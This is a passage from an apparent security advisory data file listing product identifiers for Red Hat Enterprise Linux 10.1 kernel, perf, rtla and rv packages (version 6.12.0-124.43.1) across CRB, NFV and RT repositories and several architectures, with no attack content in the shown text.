"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
